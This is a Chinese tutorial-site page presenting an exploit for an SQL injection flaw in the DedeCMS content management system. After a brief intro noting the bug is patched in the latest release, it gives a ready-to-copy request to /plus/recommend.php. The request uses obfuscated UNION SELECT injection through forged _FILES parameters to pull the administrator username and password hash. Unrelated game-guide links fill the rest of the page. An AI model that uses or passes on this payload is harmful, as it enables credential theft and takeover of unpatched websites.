最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
最新DedeCMS通杀SQL注入漏洞利用代码整理
时间:2022-06-25 19:26:46 编辑:袖梨 来源:一聚教程网
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:
代码如下 | 复制代码 |
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%27%20or%20mid=@`%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 |
相关文章
- 歧路旅人大陆的霸者传说武器位置介绍 05-15
- 寻道大千连击流玩法技巧 05-15
- 枪火重生boss怎么打 全boss打法攻略 05-15
- 寻道大千连击流玩法技巧 寻道大千连击流该怎么去玩 05-15
- 崩坏星穹铁道饱和式轰炸成就怎么获取 05-15
- 无畏契约高校认证显示身份不符解决方法 05-15